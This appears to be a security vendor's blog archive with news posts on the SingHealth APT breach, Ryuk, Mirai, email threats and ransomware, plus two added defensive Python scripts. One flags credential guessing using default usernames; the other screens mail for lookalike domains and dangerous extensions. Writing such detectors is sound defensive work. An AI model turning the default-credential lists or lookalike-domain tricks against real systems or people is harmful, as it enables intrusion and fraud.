Cybersecurity Blog
Thought leadership. Threat analysis. Cybersecurity news and alerts.
How Advanced Persistent Threat (APT) Attacks Work

The final report of the Committee of Inquiry (COI), the body tasked with investigating the worst cyber-attack in Singapore's history, concluded that an unnamed Advanced Persistent Threat (APT) group was behind the attack. “The attacker was a skilled and sophisticated actor bearing the characteristics of an Advanced Persistent Threat group,” COI said in its final report.

COI was tasked with looking into Singapore’s worst-ever cyber-attack: the data breach at Singapore Health Services Private Limited (SingHealth). The COI report (PDF), released to the public last January 10th, is a redacted version of the final report, with sensitive information that could further harm SingHealth withheld.

The unnamed APT group, the COI said, illegally accessed SingHealth’s database and removed the personally identifiable information of 1.5 million patients, including their names, addresses, genders, races, and dates of birth, between June 27, 2018 and July 4, 2018. Of the 1.5 million affected patients, nearly 159,000 also had their outpatient dispensed medication records exfiltrated. The personal and outpatient medication data of Singapore’s Prime Minister were part of the illegally accessed and removed data.

What Is an Advanced Persistent Threat (APT) Attack?

An Advanced Persistent Threat (APT), as the name suggests, is a threat that’s “advanced”, meaning that sophisticated hacking techniques are used to gain access to a system, and “persistent”, meaning that the attacker or attackers remain inside the compromised system for a prolonged period of time, resulting in destructive consequences. APT attacks on nation states, such as the attack on SingHealth, and on large corporations are the ones that are often highlighted.
APT attackers are, however, increasingly launching attacks on the smaller organizations that make up the supply chain in order to gain access to large organizations. APT attackers gain ongoing access to a system through the following series of events:

1. Initial Access

Attackers could gain initial access to a system through various means. It could be through a known software vulnerability that’s left unpatched: a security update for the software is available, but for whatever reason it hasn’t been installed. Attackers could also gain access to a system through phishing attacks – cyber-attacks that use an email as a weapon. In a phishing attack, the victim is tricked into clicking a link or downloading an attachment inside an email masquerading as coming from a legitimate entity. In the case of the SingHealth cyber-attack, the COI said, “The attacker gained initial access to SingHealth’s IT network around 23 August 2017, infecting front-end workstations, most likely through phishing attacks.”

2. Establishing Footholds

Once the attackers gain initial access to the system, they then attempt to establish a foothold or footholds in it. To establish a foothold, attackers typically implant malicious software (malware) into the system to scan and move around it undetected. In the case of the SingHealth cyber-attack, the COI said the attacker used a “suite of advanced, customized, and stealthy malware” to move stealthily within the system and to find and exploit various vulnerabilities in SingHealth’s system. According to COI, a number of security vulnerabilities in the SingHealth network had been identified in a penetration test in early 2017, and these may have been exploited by the attacker. At the time of the cyber-attack, COI said, a number of these vulnerabilities remained.

3. Intensifying Access

Attackers intensify their access within a system by gaining administrator rights – the highest level of permission granted to a computer user. In the case of the SingHealth cyber-attack, the COI said the group responsible gained administrative access to SingHealth’s servers because those servers weren’t protected with 2-factor authentication (2FA), enabling the attacker to access the servers through other means that didn’t require 2FA.

4. Stop, Look and Remain

APT attackers are a patient bunch. They are willing to wait for days, months and even years to achieve their goal, for instance to remove critical data only at the right moment. In the case of the SingHealth cyber-attack, the COI said that while the group responsible was able to infiltrate SingHealth’s servers for months, it was only on June 26, 2018 that the group obtained credentials to the SingHealth database containing a trove of patients’ data, and it then removed that data from June 27, 2018 until July 4, 2018. On July 4, 2018, an administrator at Integrated Health Information Systems Private Limited (IHiS) noticed the suspicious activity and worked with other IT administrators to terminate the exfiltration. IHiS was responsible for implementing cyber security measures and for security incident response and reporting at SingHealth. Prior to the July 4, 2018 discovery, COI said, IHiS’ IT administrators had first noticed unauthorized logins to SingHealth’s servers and failed attempts at accessing the patients’ database on June 11, 12, 13, and 26 of that year.

Prevention

Two major findings by the COI in the SingHealth cyber-attack stand out: First, remediating the security vulnerabilities identified in the early 2017 penetration test would have made it more difficult for the attacker to achieve its objectives.
Second, while the attacker operated in a stealthy manner, it wasn’t silent: IHiS’ staff did notice unauthorized activities prior to the actual data exfiltration. Recognizing these unauthorized activities as signs that a cyber-attack was under way and taking appropriate action could have prevented the data exfiltration.

Contact us today if you need assistance in protecting your organization from Advanced Persistent Threat (APT) attacks.

Cyber Attack Disrupts Operations of Major U.S. Newspapers

Cyber criminals ended 2018 with a high-profile cyber attack, this time on Tribune Publishing’s network, disrupting the news production and printing process of some of the major newspapers in the U.S. The Los Angeles Times reported that what was first thought to be a server outage at Tribune Publishing’s network was later identified as a cyber attack.

Tribune Publishing once owned the Los Angeles Times and the San Diego Union-Tribune. These 2 newspapers were later sold to a Los Angeles biotech entrepreneur. Despite the sale, they still share Tribune Publishing’s printing networks. As a result of the cyber attack at Tribune Publishing, the distribution of the December 29th print edition of these 2 newspapers was delayed. The distribution of the December 29th print edition of The New York Times and The Wall Street Journal was also delayed, as these two newspapers are printed at the Los Angeles Times’ Olympic printing plant – as the name implies, also used by the Los Angeles Times.

The cyber attack on Tribune Publishing also disrupted production of other Tribune Publishing newspapers. Tribune Publishing currently owns the Chicago Tribune, New York Daily News, The Baltimore Sun, Orlando Sentinel, South Florida's Sun-Sentinel, Virginia’s Daily Press and The Virginian-Pilot, The Morning Call of Lehigh Valley, Pennsylvania, and the Hartford Courant.
The Chicago Tribune, for its part, reported that its December 29th print edition was published without paid death notices and classified ads as a result of the cyber incident at Tribune Publishing. Marisa Kollias, Tribune Publishing spokeswoman, said in a statement that by December 30th, production and delivery were back on track at all the newspapers concerned. She didn’t, however, address the details of the cyber attack itself. “We acted promptly to secure the environment while ... creating workarounds to ensure we could print our newspapers,” Kollias said. “The personal data of our subscribers, online users, and advertising clients has not been compromised.”

While authorities and Tribune Publishing are silent about the cause of the cyber attack and whether the attacker or attackers asked for a ransom, the Los Angeles Times and Chicago Tribune reported that several individuals with knowledge of the situation said the cyber attack bore the signature of Ryuk ransomware.

What Is Ryuk Ransomware?

Ryuk is malicious software (malware) that’s categorized as ransomware. In a ransomware attack, all or selected files on a computer infected by the ransomware are encrypted, that is, converted from plaintext or any other type of data into an encoded version, denying legitimate users access to these files. Ransomware victims are informed of the file encryption via a notice shown on the monitor of the infected computer. This notice also functions as a ransom note. Ransomware is characterized by the fact that victims are asked to pay a ransom, typically in a cryptocurrency like Bitcoin (also referred to as BTC), on the promise that once the ransom is paid, a decryption key to unlock the encrypted files will be given.

Ryuk was first reported by security researchers at Check Point on August 20, 2018.
The researchers said that in the 2 weeks prior to August 20th, Ryuk’s perpetrator or perpetrators attacked various organizations worldwide, earning over $640,000 in just that span of 2 weeks. Check Point researchers said Ryuk’s early attacks encrypted hundreds of personal computers, storage and data centers in each infected organization. Some organizations paid a large ransom in order to retrieve their files. The highest recorded payment was 50 BTC, then priced at nearly $320,000.

According to Check Point researchers, Ryuk is a highly targeted attack, which requires “extensive network mapping, hacking and credential collection” prior to each operation. In addition to encrypting files on local drives, Ryuk also encrypts network resources.

Analysis of Ryuk conducted by Check Point researchers showed that this ransomware is similar in many ways to another ransomware called “Hermes”. The attack on Far Eastern International Bank (FEIB) in Taiwan in October 2017 brought Hermes to public attention. While Hermes exhibited the typical characteristics of ransomware in the FEIB attack, it acted only as a diversion, as the attackers’ ultimate goal was to steal money. The FEIB attackers stole $60 million in a sophisticated SWIFT attack, but the total amount stolen was later retrieved. Unlike Hermes, Ryuk functions not as a diversionary tactic but as the main act.

Here are some similarities between Hermes and Ryuk that led the Check Point researchers to conclude that whoever wrote the Ryuk source code had access to the Hermes source code (to date, the source code of neither Ryuk nor Hermes is publicly available):

Similarity in Encryption Logic

The encryption logic in Hermes and Ryuk is similar in structure.

Whitelisting of Similar Folders

Both Hermes and Ryuk encrypt every file and directory except “Windows”, “Mozilla”, “Chrome”, “RecycleBin” and “Ahnlab”.
One explanation why attackers want victims to keep using browsers like Chrome and Mozilla Firefox is to allow victims to search online for what the ransom note means.

Prevention

Here are some security best practices to prevent or minimize the effects of ransomware attacks like Ryuk:

Implement Network Segmentation

Network segmentation is the practice of splitting a corporate network into subnetworks. This practice ensures that if one subnetwork is infected with malware like Ryuk, the other subnetworks won’t be infected. In addition to improving security, network segmentation also boosts efficiency.

Back Up Critical Files

These are the main reasons why organizations are willing to pay an exceptionally large ransom to cyber attackers: a) victims want their files back, as these files are important to their existence, and b) victims have no copies of these critical files. Organizations that regularly back up critical files can afford not to pay a ransom to attackers.

Contact us today if you need assistance in protecting your organization’s resources from ransomware attacks.

Top 3 Cyber Security Predictions in 2019

Cyber-attacks are becoming more common and have become a looming threat not just to large enterprises but also to small and medium-sized organizations. Here are our top 3 cyber security predictions for the year 2019:

1. Cloud Attack Threat

There’s a looming threat in the cloud, as this is where the data is heading. A study conducted by LogicMonitor (PDF) predicted that the majority of IT workloads will move to the cloud by 2020, with workloads running in public clouds reaching 41% in 2020, workloads running on-premises falling to 27% and the balance running on private or hybrid clouds. Another study, conducted by Gartner, predicted cloud computing will be a $300 billion business by 2021.
According to Gartner, organizations increasingly adopt cloud services as these have been proven to provide the speed, agility and cost reduction that digital business requires. There’s, however, a flipside to the positive contributions of cloud computing. A 2nd quarter of 2018 study conducted by Gartner revealed that organizations continue to struggle with cloud security, with an estimated $400 billion lost to cyber theft and fraud worldwide. Expanding cloud services as part of an organization’s digital initiatives is indeed needed, but these initiatives should be matched with a sound cloud security strategy, as cyber criminals know that there’s money in the cloud.

There are many attack surfaces in the cloud that attackers could easily exploit. For instance, in early 2018, RedLock reported that attackers illicitly used Tesla’s cloud computing resources to mine a cryptocurrency. According to RedLock, the attackers were able to gain access to Tesla’s cloud computing resources because Tesla openly exposed its Kubernetes – an open-source platform for managing cloud workloads and services – without password protection. Tesla’s exposed Kubernetes, RedLock said, contained the credentials of Tesla’s Amazon Web Services account.

In cryptocurrency mining, those who allow their computers to be used for mining digital coins are financially compensated for the computer and electricity usage. Cryptocurrency mining is legal in most countries, but legality ends when this is done without the knowledge and consent of the owner of the computing resource – a cyber crime called “cryptojacking”. Since the most popular cryptocurrency, Bitcoin, reached an all-time high price of nearly $20,000 in late 2017, there has been a dramatic rise in cryptojacking.

2. Botnet Threat

Connecting almost every computing device, including servers and Internet of Things (IoT) devices such as routers and security cameras, to the internet exposes online resources such as websites to botnet attacks.
A botnet, a term that combines “robot” and “network”, is a group of malware-infected computers that’s remotely controlled by an attacker or attackers to conduct malicious activities such as distributed denial-of-service (DDoS) attacks. In a DDoS attack, fake traffic originating from malware-infected devices is directed at a target website, rendering it inaccessible to legitimate users.

In recent years, cyber attackers have tweaked the source code of the infamous malware called “Mirai” in a number of ways. At its peak in 2016, the Mirai malware infected hundreds of thousands of IoT devices worldwide and turned them into a “network of robots” to conduct malicious activities, including DDoS attacks. In October 2016, the Mirai botnet almost brought down the internet when it attacked Dyn, a domain name service (DNS) provider. As a result of the attack on Dyn, 80 popular websites, including Twitter, Amazon, Reddit, Spotify and Netflix, temporarily became inaccessible to the public.

A notable Mirai variant was recently discovered by researchers at Netscout. While the original Mirai infected IoT devices and made them part of a botnet, the Mirai variant discovered by Netscout researchers infected enterprise Linux servers and made those compromised servers part of a botnet. Turning hundreds of thousands or millions of IoT devices and a handful of enterprise servers into a DDoS botnet could bring down the internet or render many websites inaccessible to the public.

It’s important to note that Mirai and other Mirai variant infections are preventable. The original Mirai infected hundreds of thousands of IoT devices by simply logging in to these devices using default or factory username and password combinations. Merely changing the default or factory username and password renders the original Mirai useless.
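Two passages on this page leave the same kind of trace in authentication logs: the SingHealth timeline above, where unauthorized logins and failed database-access attempts on June 11, 12, 13 and 26 were noticed but not recognized as an attack, and Mirai’s credential guessing, where default username and password pairs are tried against a device one after another. The script below is an added example written for this post; it is not code from the COI report, IHiS, Netscout or this blog. It parses a constructed, simplified login-event format and applies two rules: a burst rule for many failures from one source in a short window (credential guessing), and a low-and-slow rule for the same account failing against the same host on several distinct days. Each alert records whether a successful login followed the failures, which is what separates noise from a likely compromise. The hostnames, IP addresses, usernames and log format are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (simplified format, not real SingHealth/IHiS or Mirai telemetry).
# db01 shows the low-and-slow pattern: one failure per night on several days, then success.
# cam01 shows the burst pattern: many usernames from one source within seconds, then success.
SAMPLE_LOG = """\
2018-06-11T02:14:05 host=db01 event=login_failed user=svc_report src=10.20.0.7
2018-06-12T01:58:41 host=db01 event=login_failed user=svc_report src=10.20.0.7
2018-06-13T02:03:12 host=db01 event=login_failed user=svc_report src=10.20.0.7
2018-06-18T11:00:00 host=cam01 event=login_failed user=root src=203.0.113.9
2018-06-18T11:00:01 host=cam01 event=login_failed user=admin src=203.0.113.9
2018-06-18T11:00:02 host=cam01 event=login_failed user=support src=203.0.113.9
2018-06-18T11:00:03 host=cam01 event=login_failed user=user src=203.0.113.9
2018-06-18T11:00:04 host=cam01 event=login_failed user=guest src=203.0.113.9
2018-06-18T11:00:05 host=cam01 event=login_failed user=admin1 src=203.0.113.9
2018-06-18T11:00:06 host=cam01 event=login_ok user=admin src=203.0.113.9
2018-06-20T09:00:00 host=db01 event=login_failed user=alice src=10.20.0.55
2018-06-20T09:00:30 host=db01 event=login_ok user=alice src=10.20.0.55
2018-06-26T03:22:09 host=db01 event=login_failed user=svc_report src=10.20.0.7
2018-06-26T03:22:40 host=db01 event=login_ok user=svc_report src=10.20.0.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\S+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_log(text):
    """Parse log lines into dicts sorted by timestamp; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def success_after(events, when, **match):
    """True if a login_ok with the given field values occurs at or after `when`."""
    return any(
        e["event"] == "login_ok" and e["ts"] >= when and all(e[k] == v for k, v in match.items())
        for e in events
    )


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Burst rule: >= threshold failures from one source against one host inside `window`.
    The usernames tried are reported because cycling through default accounts
    (root, admin, support, ...) is the hallmark of Mirai-style credential guessing."""
    alerts = []
    failures = defaultdict(list)
    for e in events:
        if e["event"] == "login_failed":
            failures[(e["src"], e["host"])].append(e)
    for (src, host), fails in failures.items():
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "type": "bruteforce", "src": src, "host": host,
                    "failures": end - start + 1,
                    "usernames": sorted({f["user"] for f in fails[start:end + 1]}),
                    "then_success": success_after(events, fails[end]["ts"], src=src, host=host),
                })
                break  # one alert per source/host pair is enough
    return alerts


def detect_low_and_slow(events, min_days=3, span=timedelta(days=30)):
    """Low-and-slow rule: the same account fails against the same host on >= min_days
    distinct days within `span`. Each day is far below the burst threshold, so only
    correlating across days surfaces it."""
    alerts = []
    days_by_key = defaultdict(set)
    last_fail = {}
    for e in events:  # events are sorted, so last_fail ends up holding the latest failure
        if e["event"] == "login_failed":
            key = (e["user"], e["host"])
            days_by_key[key].add(e["ts"].date())
            last_fail[key] = e["ts"]
    for (user, host), days in days_by_key.items():
        days = sorted(days)
        if len(days) >= min_days and days[-1] - days[0] <= span:
            alerts.append({
                "type": "low_and_slow", "user": user, "host": host,
                "days": [d.isoformat() for d in days],
                "then_success": success_after(events, last_fail[(user, host)], user=user, host=host),
            })
    return alerts


def analyze(text):
    """Run both rules over a log text and return the combined alert list."""
    events = parse_log(text)
    return detect_bruteforce(events) + detect_low_and_slow(events)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately conservative for the sample data; in production they are tuned per host class (an internet-facing camera and an internal database server do not share a baseline), and the `then_success` flag is what should raise an alert from “investigate when convenient” to “respond now”.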
The recent Mirai variant discovered by Netscout researchers, on the other hand, infiltrated servers that were unpatched, and did so through brute force – the systematic attempt to guess the correct username and password combination. Patching, that is, the timely installation of security updates, and the use of complex passwords could render this recent Mirai variant useless.

3. Shortage of Cyber Security Skills

While it’s widely known that there’s a shortage of cyber security professionals, what isn’t known is how dire the situation is. A study conducted by (ISC)2 revealed that the shortage of cyber security professionals around the world has never been more acute, placing the shortage at 2.93 million, with roughly 500,000 of these positions located in North America, 2.15 million in Asia-Pacific and the balance in other parts of the world. “The lack of skilled cybersecurity personnel is doing more than putting companies at risk; it’s affecting the job satisfaction of their existing staff,” the (ISC)2 report said.

Happy New Year and stay safe!

Email-Borne Threats Still Bypass Current Security Systems, Study Shows

Despite advances in current email security systems, a new study reveals that these systems still miss a significant number of email-borne threats. In the 3rd quarter of 2018, Mimecast retested 80 million emails that had been considered “safe” by current email security systems. The Mimecast study found that among the 80 million emails deemed “safe”, 42,350 were impersonation attacks, 17,403 contained malicious software (malware) attachments, 16,581 contained dangerous file types, and 205,363 malicious URLs were found. Impersonation attacks refer to emails that attempt to impersonate a trusted individual or company in order to gain access to corporate finances or data.
Dangerous files, meanwhile, refer to files such as .jsp, .exe, .dll and .src – files that allow a program to run on a computer, exposing the computer to further cyber attacks. According to Mimecast, dangerous files bypassed current email security systems at an increased rate, showing a 25% increase from the last quarterly test.

How Prevalent Are Email-Borne Threats?

In the first half of 2018, over half a billion emails were analyzed by FireEye. It found that less than a third, or 32%, of email traffic was considered “clean” and delivered to an inbox. FireEye’s analysis found that 1 in every 101 emails had malicious intent. FireEye further found that the majority, or 90%, of the blocked emails contained no malware – 81% of those were phishing attacks and 19% impersonation attacks.

Cyber criminals see the advantage of leveraging email as a means to wage cyber-attacks, as email continues to be the preferred form of communication worldwide despite the growth of other technologies such as social networking, instant messaging and chat. Email also maintains its dominance as it’s an integral part of the overall internet experience: an email address is required if you want to use a social networking site or your bank’s online service. According to The Radicati Group (PDF), over half of the world population uses email in 2018, with the number of worldwide email users expected to top 3.8 billion in 2018 and to grow to over 4.2 billion by the end of 2022.

The following trends in email-borne threats were observed by FireEye and The Radicati Group:

Blended Attacks

The most common form of email-borne threat is the blended attack – a form of attack that combines an email and web access to deliver malware to an organization’s internal network. In a blended attack, the email itself doesn’t contain malware.
The email only facilitates the delivery of the malware: it contains a link that, when clicked, goes directly to a malicious website, and from there the malware is downloaded and infects the organization’s internal network.

Impersonation Attacks Have Gone Mainstream

The cyber-attack called “business email compromise”, also known as BEC or CEO fraud, is an example of an impersonation attack. In an impersonation or BEC attack, an attacker or attackers send a bogus email purportedly from the CEO to a targeted employee, typically one who has access to company finances. Through the bogus email, the attackers request that the targeted employee make an urgent money transfer, usually to a trusted vendor’s new bank account. Many for-profit and nonprofit organizations have been duped by BEC scammers in recent years. According to the Federal Bureau of Investigation (FBI), BEC scammers, between October 2013 and May 2018, defrauded different organizations worldwide of almost $12.5 million.

Email Attack Schedule

Malware-based attacks most likely occur on Mondays and Wednesdays. On Thursdays, malware-less attacks most likely happen. Impersonation attacks, meanwhile, most likely occur on Fridays. One example of a malware-less email is the impersonation email, an email that spoofs domains or uses lookalike domains. Another example of a malware-less malicious email is the blended email, whereby the email contains a link to a malicious URL. An additional example of a malware-less malicious email is one that contains a dangerous file such as an .exe file. One explanation why impersonation emails are sent on Fridays is that impersonation emails are typically bogus emails from an organization’s CEO. On Fridays, especially late Friday afternoon, it’s typically difficult to call or talk in person with the boss – a situation favored by scammers to buy time to trick a targeted employee.
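The three malware-less threats just described (lookalike or spoofed sender domains used for CEO fraud, links to malicious URLs in blended attacks, and dangerous file types such as .exe) can each be checked mechanically before a message reaches an inbox. The screener below is an added example written for this post, not code from Mimecast, FireEye or this blog, and it is not a substitute for a mail gateway; it shows the kind of checks such a gateway performs. The trusted domains, executive names, dangerous-extension set, and the four sample messages are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed reference data: the organization's own domains, the executives whose
# names CEO-fraud mail borrows, and a sample set of file types the post calls
# dangerous (not an exhaustive list).
TRUSTED_DOMAINS = {"example-corp.com", "example-bank.com"}
TRUSTED_NAMES = {"Jane Doe"}
DANGEROUS_EXTS = {"exe", "dll", "jsp", "scr", "js"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})


def normalize_domain(domain):
    """Fold the usual lookalike tricks: digit-for-letter, rn-for-m, vv-for-w, extra punctuation."""
    d = domain.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")
    return re.sub(r"[^a-z0-9.]", "", d)


def edit_distance(a, b):
    """Levenshtein distance; one insertion, deletion or substitution counts as 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain):
    """Return the trusted domain that `domain` imitates, or None if it is trusted or unrelated."""
    if domain.lower() in TRUSTED_DOMAINS:
        return None
    norm = normalize_domain(domain)
    for trusted in TRUSTED_DOMAINS:
        if edit_distance(norm, normalize_domain(trusted)) <= 1:
            return trusted
    return None


def screen_email(msg):
    """Return a list of findings for a message dict {from_name, from_addr, attachments, body}."""
    findings = []
    domain = msg["from_addr"].rsplit("@", 1)[-1]
    target = lookalike_of(domain)
    if target:
        findings.append(f"lookalike sender domain {domain} imitates {target}")
    # Display-name spoofing: a known executive's name on mail from outside the company.
    if msg["from_name"] in TRUSTED_NAMES and domain.lower() not in TRUSTED_DOMAINS:
        findings.append(f"display name '{msg['from_name']}' used from untrusted domain {domain}")
    # Dangerous file types; the last suffix decides, so invoice.pdf.exe is still .exe.
    for name in msg.get("attachments", []):
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in DANGEROUS_EXTS:
            findings.append(f"dangerous attachment type .{ext}: {name}")
    # Blended-attack indicators: links to raw IP addresses or to lookalike hosts.
    for url in URL_RE.findall(msg.get("body", "")):
        host = (urlparse(url).hostname or "").lower()
        if IP_RE.fullmatch(host):
            findings.append(f"link to raw IP address: {url}")
        elif lookalike_of(host):
            findings.append(f"link host {host} imitates {lookalike_of(host)}")
    return findings


# Constructed sample messages: CEO fraud from a digit-for-letter domain, a double-extension
# attachment, a credential-phishing link to a bare IP, and one legitimate internal mail.
SAMPLE_MESSAGES = [
    {"from_name": "Jane Doe", "from_addr": "jane.doe@examp1e-corp.com",
     "attachments": [], "body": "Need an urgent wire to our new vendor account today. Jane"},
    {"from_name": "Accounts", "from_addr": "billing@unrelated-vendor.net",
     "attachments": ["invoice.pdf.exe"], "body": "See attached invoice."},
    {"from_name": "IT Helpdesk", "from_addr": "helpdesk@example-corp.co",
     "attachments": [], "body": "Reset your password at http://203.0.113.5/reset now."},
    {"from_name": "Bob Lee", "from_addr": "bob@example-corp.com",
     "attachments": ["q3-report.pdf"], "body": "Slides: https://docs.example-corp.com/q3"},
]


def screen_all(messages=SAMPLE_MESSAGES):
    """Screen every message and return the list of finding lists, one per message."""
    return [screen_email(m) for m in messages]


if __name__ == "__main__":
    for msg, findings in zip(SAMPLE_MESSAGES, screen_all()):
        print(msg["from_addr"], "->", findings or "clean")
```

The homoglyph folding is intentionally aggressive (a digit 1 is treated as a letter l), so on real traffic the lookalike rule should feed a quarantine-and-review queue rather than a hard block; the display-name rule, by contrast, has almost no legitimate hits and is the cheapest CEO-fraud control an organization can deploy.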
How to Prevent Email Attacks

Here are some security measures to block or detect email-borne threats:

Staff Training

In an email-based attack, it only takes one click to infect your organization’s internal network. And your weakest link for this particular type of cyber-attack is your staff. Staff training isn’t just a one-shot deal. It needs to be continuous as well as effective. It’s particularly important to train executives and employees dealing with finances to be vigilant against email-borne threats, as they’re targeted by criminals, especially in BEC attacks. One way to train your organization's staff is by sending test emails to check their resilience against email-borne threats.

Use an Advanced Email Security Tool

Traditional email security tools only block emails that contain malware. An advanced email security tool, in addition to blocking emails laden with malware, blocks malicious emails that use spoofed domains or lookalike domains, emails containing malicious URLs and emails containing dangerous files.

Contact us today if you need assistance in protecting your organization’s network from email-borne threats.

11/30/2018

Hard Lessons from a Ransomware Attack

A regional county municipality in the province of Quebec, Canada has learned hard lessons about cybersecurity after it suffered a paralyzing ransomware attack. Bernard Thompson, reeve of Mekinac regional county municipality, told The Canadian Press that the ransomware attack that paralyzed the municipality’s servers gave the municipality hard lessons in cybersecurity. “In the end, in terms of the security of our system, [the ransomware attack] was actually positive,” Thompson said. The cyberattack against Mekinac's servers highlights the importance of protecting your organization's servers against ransomware attacks.
How the Mekinac Cyberattack Unfolded

The Canadian Press reported that on September 10, 2018, municipal employees, upon returning to work after a weekend break, found a ransomware notice on their work computers informing them that their files were locked. The ransomware notices also specified that in order to unlock the files, a total of 8 Bitcoins, then equivalent to $65,000, must be paid to the attackers. The municipality’s servers were disabled for nearly 2 weeks as a result of the ransomware attack. The attack ended when the municipality negotiated and paid $30,000 worth of Bitcoin as ransom to unlock the locked files. “It was hard, clearly, on the moral side of things that we had to pay a bunch of bandits,” Thompson said. He said this was the road the municipality took, as choosing the other way could have meant months of data re-entry, costing significantly more than $30,000. Mekinac’s ransomware attackers are still unidentified and their location has not been determined to date.

What Is a Ransomware Attack?

Ransomware is malicious software (malware) that encrypts files. Encryption is traditionally used to prevent data theft. In encryption, plaintext or any other form of data is converted from a readable format into an encoded version – a format that can only be read by someone with access to the decryption key. In a ransomware attack, attackers convert the victim’s data from a readable format into an encoded version and demand a ransom payment from the victim in exchange for the decryption key. Ransomware infects computers or servers in many ways. Here are some of them:

1. Email-Based Attack

In the case of the Mekinac ransomware attack, the municipality’s servers were infected by ransomware after an employee opened and clicked on a link in a malicious email sent by the attackers. It wasn’t specified, however, which particular ransomware hit Mekinac’s servers.
The ransomware called “Locky” is an example of ransomware that’s spread via email spam campaigns. This ransomware arrives on a victim’s computer as a Microsoft Office email attachment that evades antispam filters and tricks the user into opening the attachment. Once this malicious attachment is opened, Locky encrypts the computer’s files and then demands that the victim pay a ransom to unlock the encrypted or locked files.

2. Drive-By Attack

A drive-by attack is another way by which attackers infect computers or servers. Bad Rabbit ransomware is an example of ransomware that’s distributed via drive-by attacks. In a drive-by attack, attackers insert malicious code, in this case ransomware, into an insecure website. Once a user visits this compromised site, the malware may either download directly to the visitor’s computer, or the visitor is redirected to another website controlled by the attackers, from where the malware is downloaded to the victim’s computer.

3. Unpatched Servers

The ransomware called “SamSam” is an example of ransomware that infects servers while they’re in an unpatched state. An unpatched server is one that isn’t updated despite the availability of a security update. Researchers at Cisco Talos, in a blog post, wrote, “Adversaries are exploiting known vulnerabilities in unpatched JBoss servers before installing a web shell, identifying further network connected systems, and installing SamSam ransomware to encrypt files on these devices.”

Lessons from Ransomware Attacks

Thompson, reeve of Mekinac regional county municipality, said that the ransomware attack on Mekinac’s servers taught the municipality to encrypt everything and to analyze every email. “Everything is encrypted now,” Thompson said. “Every email is analyzed before we even receive it. Every day, our system catches malicious emails trying to penetrate – but they are stopped. But the attacks keep coming.”

In addition to encryption and email scanning, here are additional best practices to protect your organization’s servers from ransomware attacks:

Back Up Important Files

Backup copies kept in safe storage that isn’t connected to your organization’s servers give your organization assurance that if anything happens to the servers, for instance a ransomware attack, your organization will still have other copies of its important files. This removes the pressure to pay a ransom to attackers for the decryption key that unlocks the locked files.

Keep All Software Up-To-Date

Make sure that all your organization’s software, specifically the server operating system, is up-to-date. Every security update or patch issued by software vendors contains fixes for security vulnerabilities that cybercriminals are quick to exploit.

Implement Domain Whitelisting

Whitelisting certain domains won’t prevent drive-by download attacks, but it’ll prevent secondary malicious websites from loading.

Limit the Number of Users with Administrator Privileges

A computer user with administrator privileges can install and uninstall software and change configuration settings. Restricting this privilege to a small number of personnel limits the exposure of your organization’s servers to drive-by attacks.

When your organization needs help, our experts are a phone call away. Contact us today to prevent ransomware attacks.

11/12/2018

Why the Pentagon Data Breach is a Wake-up Call for Better Screening of Third-party Vendors

On October 14, 2018, news of a major data breach at the Pentagon hit the headlines. This was a startling, even disturbing, reminder that even the most important, most secure institutions in the world are vulnerable when hackers identify a way into their systems.
As the Department of Defense’s headquarters, the Pentagon plays a critical role in the United States military and national security: it oversees all aspects of the Air Force, Marines, Army, Coast Guard and Navy, ultimately helping to defend the country. The very notion that a global symbol of security and power would fall prey to a data breach has surprised many, but it shouldn’t have. At a time when cyber-criminals continue to employ increasingly sophisticated techniques to disrupt businesses and organizations of all kinds, this incident is proof positive that proper screening of third-party vendors is critical for effective cybersecurity.

What Data Was Involved in the Pentagon Breach?

It’s believed that as many as 30,000 employees’ travel records were compromised as a result of the data breach. This includes personal details and credit-card data pertaining to civilians and military personnel: all sensitive information that could have serious financial repercussions if acted upon. The breach may have first occurred months before it was discovered, and it’s believed the actual number of people potentially affected could rise as the investigation continues. However, no classified information is said to have been compromised.

How Did the Pentagon Breach Happen?

The Pentagon breach was the result of work conducted by a ‘single commercial vendor’ delivering its service to a ‘very small percentage’ of the DoD’s employees. The vendor in question has remained anonymous and was, in the days after the announcement, still contracted to provide its services. News of the breach struck after the U.S. Government Accountability Office confirmed that work had been undertaken to secure the Pentagon’s networks, though its weapons system security was under closer scrutiny. The office said keeping weapons systems secure is becoming more and more challenging due to the rise of sophisticated cyber-crime tactics. Pentagon personnel have faced similar issues before.
A large attack on the federal Office of Personnel Management in 2015 left the personal details of over 21 million individuals (including people at the Pentagon) compromised. As with this latest incident, the 2015 attack supposedly first occurred months before word of it reached the media.

Who was Responsible for The Pentagon Breach?
